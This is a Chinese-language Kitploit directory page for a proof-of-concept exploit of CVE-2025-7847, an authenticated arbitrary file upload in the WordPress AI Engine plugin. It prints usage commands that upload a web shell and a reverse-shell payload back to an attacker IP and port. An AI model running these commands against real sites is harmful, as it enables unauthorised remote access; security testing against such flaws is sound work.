Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-7847-POC — WordPress 插件 AI Engine 2.9.3 - 2.9.4 概念验证 | Kitploit
工具/GitHubGitHub/ericardiansa/cve-2025-7847-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubericardiansa/cve-2025-7847-poc

CVE-2025-7847-POC

WordPress 插件 AI Engine 2.9.3 - 2.9.4 概念验证

查看仓库
1211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-7847 Wordpress插件 已验证订阅者任意文件上传 POC

Wordpress插件 AI Engine 2.9.3 - 2.9.4 概念验证

请注意,此漏洞仅在启用“Public API”选项时才能被利用,该选项默认是禁用的,并且没有配置Bearer Token,也没有添加和用于保护API的自定义身份验证。

自动化版本

root@kitploit:~
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444

仅Web Shell上传

root@kitploit:~
python3 exploit.py \                                                                                                                          
  --url "http://target.com/" \
  --username "Admin" \
  --password "L87*********C4u" \
  --file shell.php
下载工具